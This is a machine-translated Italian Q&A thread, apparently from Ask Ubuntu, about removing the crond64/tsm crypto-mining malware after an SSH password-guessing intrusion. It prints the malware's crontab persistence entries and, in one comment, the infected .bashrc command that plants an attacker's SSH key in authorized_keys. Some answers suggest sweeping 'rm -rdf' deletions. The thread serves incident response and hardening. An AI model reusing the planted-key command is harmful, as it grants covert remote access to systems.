virus crond64 / tsm in Ubuntu

14

Di recente ho notato che il mio server di casa è diventato dolorosamente lento. Tutte le risorse sono state divorate da due processi: crond64e tsm. Anche se li ho uccisi ripetutamente, continuavano a presentarsi ancora e ancora.

Allo stesso tempo, il mio ISP mi stava avvisando di un abuso derivante dal mio indirizzo IP:

==================== Excerpt from log for 178.22.105.xxx====================
Note: Local timezone is +0100 (CET)
Jan 28 20:55:44 shared06 sshd[26722]: Invalid user admin from 178.22.105.xxx
Jan 28 20:55:44 shared06 sshd[26722]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.22.105.xxx
Jan 28 20:55:45 shared06 sshd[26722]: Failed password for invalid user admin from 178.22.105.xxx port 33532 ssh2
Jan 28 20:55:46 shared06 sshd[26722]: Received disconnect from 178.22.105.xxx port 33532:11: Bye Bye [preauth]
Jan 28 20:55:46 shared06 sshd[26722]: Disconnected from 178.22.105.xxx port 33532 [preauth]
Jan 28 21:12:05 shared06 sshd[30920]: Invalid user odm from 178.22.105.xxx
Jan 28 21:12:05 shared06 sshd[30920]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.22.105.xxx
Jan 28 21:12:07 shared06 sshd[30920]: Failed password for invalid user odm from 178.22.105.xxx port 45114 ssh2
Jan 28 21:12:07 shared06 sshd[30920]: Received disconnect from 178.22.105.xxx port 45114:11: Bye Bye [preauth]
Jan 28 21:12:07 shared06 sshd[30920]: Disconnected from 178.22.105.xxx port 45114 [preauth]

Questo sito Web mi ha informato che avrei potuto avere un virus. Eseguo Sophos AV eseguendo la scansione del mio intero disco rigido e in effetti ha trovato del virus /tmp/.mountfs/.rsync. Quindi ho eliminato l'intera cartella e ho pensato che fosse così. Ma continuava a tornare dopo. Quindi ho controllato il file cron dell'utente /var/spool/cron/crontabs/kodi(il virus era in esecuzione utilizzando l'utente del mio media server kodi), che assomigliava a questo:

# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (cron.d installed on Sun Feb  3 21:52:03 2019)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* */12 * * * /home/kodi/.ttp/a/upd>/dev/null 2>&1
@reboot /home/kodi/.ttp/a/upd>/dev/null 2>&1
5 8 * * 0 /home/kodi/.ttp/b/sync>/dev/null 2>&1
@reboot /home/kodi/.ttp/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.mountfs/.rsync/c/aptitude>/dev/null 2>&1

Sembra che il virus si riattivi di tanto in tanto da un'altra directory. Il contenuto di quella directory è:

>>> ls /home/kodi/.ttp/*
/home/kodi/.ttp/cron.d  /home/kodi/.ttp/dir2.dir

/home/kodi/.ttp/a:
a  bash.pid  config.txt  crond32  crond64  cronda  crondb  dir.dir  pools.txt  run  stop  upd

/home/kodi/.ttp/b:
a  dir.dir  rsync  run  stop  sync

/home/kodi/.ttp/c:
aptitude  dir.dir  go  ip  lib  n  p  run  slow  start  stop  tsm  tsm32  tsm64  v  watchdog

Ho eliminato tutti questi file e le voci nel crontab e spero con questo, il problema è risolto. Tuttavia, sarei interessato al tipo di virus, a come avrei potuto prenderlo (potrebbe essere collegato a Kodi) e cosa posso fare per prevenirlo. Fortunatamente, era in esecuzione solo da un utente con diritti limitati, ma era comunque fastidioso da gestire.

MODIFICARE

Anche se apparentemente ho rimosso tutti i resti di questo virus (ho anche rimosso l'intera cartella tmp), il virus ha continuato a tornare. Mi sono reso conto che c'era un'entrata ~/.ssh/authorized_hosts, che sicuramente non mi ero messo. Questo spiega come il virus potrebbe essere ripiantato ripetutamente. Ho rimosso la voce, disabilitato l'accesso per quell'utente, disabilitato l'accesso con password (solo passkey) e ora uso una porta non standard.

Ho anche notato ripetuti tentativi di accesso sul mio server con nomi utente casuali, probabilmente da una specie di bot (il registro sembrava sorprendentemente simile a quello lanciato dal mio IP, inviato dal mio ISP). Immagino che sia così che il mio computer è stato infettato in primo luogo.

malware  antivirus 
erik
fonte
4
Tieni presente che se sei già stato violato una volta, è probabile che ci siano altre cose sul disco che sono infette o violate. Probabilmente dovresti far saltare il sistema e ricostruirlo. I virus interessano molto raramente solo un'applicazione e generalmente si diffondono sul disco.
Thomas Ward
Sono d'accordo! se qualcuno è entrato nel tuo sistema cancella il sistema e ripristina un backup del sistema
Rinzwind
Certo, questa sarebbe la soluzione di salvataggio. Ma avevo appena reinstallato questo sistema e non volevo reinstallarlo senza capire cosa è successo. Copiando i file, questo avrebbe potuto ricominciare da capo e avrei perso tempo.
Erik,
Probabilmente, il tuo sistema è stato violato, quindi il modo in cui il virus viene continuamente infettato. Darei una bomba al sistema e ricomincerei da capo.
Thomas Ward
1
Ho anche trovato l'infezione nel file .bashrc dell'utente: cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB... ...VKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~. Ho appena fatto un cp /etc/skel/.bashrc /home/mycompromiseduser/per rimuoverlo.
Letjump

Risposte:

6

Ho avuto lo stesso. Il servizio ha installato rsync e ha ottenuto alcuni file. Ho trovato un dota.tar.gzfile nella cartella dell'utente.

  1. negare la porta 22 in uscita nel firewall (ad es. ufw deny out 22)
  2. pkill -KILL -u kodi (questo uccide tutti i processi in esecuzione dell'utente kodi)
  3. deluser kodi
  4. rimuovi userhome
  5. rimuovere rsync (non l'ho usato)
  6. rimuovere /tmp/.mountfs*

Si prega di notare che questo probabilmente rovinerà le cose per Kodi. Invece di rimuovere l'intera homehome è possibile rimuovere solo dota.tar.gz(se è presente) e la .ttpcartella (non dimenticare di pulire il crontab!)

Dopo un riavvio non vedo più alcuna connessione in uscita (verificare con: 

netstat -peanut | grep 22

Infezione avvenuta tramite un utente con una password debole (forse un account Kodi con la password predefinita?)

Sjors Nijhuis
fonte
1

Ho avuto lo stesso malware. L'immissione avveniva tramite una password utente non salvata tramite ssh (porta non predefinita), è stata rilevata e rimossa dopo circa 24 ore.

Nel mio caso, l'eliminazione di crontab dell'utente, rm -rdf /tmp/.*, rm -rdf /home/user/.*, killall -u userera abbastanza.

finale
fonte
1

Ho avuto questa cosa oggi. Ho esaminato il sistema e ho scoperto che il mio sistema ha le sue tracce per circa un mese e non mi sono reso conto che questa cosa era lì fino a quando il mio ISP non mi ha informato.

Il malware è arrivato da un utente insicuro con una password debole. Nel mio caso è stato l'utente timemachine. Il registro delle penetrazioni sembrava così.

98341:Dec 23 23:45:36 fileserver sshd[23179]: Accepted password for timemachine from 46.101.149.19 port 45573 ssh2

Questo è XMRIG minatore e un exploit che analizza altri IP per le stesse debolezze. Quindi, una macchina può infettare in cascata dozzine di altre. Puoi dare un'occhiata al rapporto MS su questo attacco informatico .

La protezione più efficace da questo tipo di attacchi è l'installazione fail2bansul server, l'accesso ssh con limitazione della velocità ufwe l'uso della lista bianca ACL per i sistemi che possono accedere a SSH sul server.

Savrulin romano
fonte
0

Nel mio caso la fonte di infezione era un utente che non avrebbe cambiato la sua password non sicura da quando ho creato il suo account (ovviamente gliel'ho detto). Il mio server probabilmente è in alcuni elenchi: ricevo circa 1000 ban alla settimana da fail2ban (provo 4 volte con un utente o una password sbagliati e rimango bloccato per un mese)

Sjors Nijhuis
fonte
0

Questa è la mia soluzione (anche chiamata malware di crittografia):

  1. pkill i lavori crontab
  2. pulire qualunque sia la descrizione di questo lavoro crontab che punta ad esempio: /home/xxx/.ttp/a/upd>/dev/null 2> & 1
  3. rimuovere /tmp/.xxx/.rsync/c/aptitude>/dev/null 2> & 1
  4. il più importante (mi ci vuole molto per arrivarci), altrimenti continuerà a tornare: esegui crontab -e (per questo utente) troverai il lavoro sopra crontab è lì, cancellali tutti, salvalo.
  5. cambia il numero di porta.
Jack Ma
fonte
Utilizzando il nostro sito, riconosci di aver letto e compreso le nostre Informativa sui cookie e Informativa sulla privacy.
Licensed under cc by-sa 3.0 with attribution required.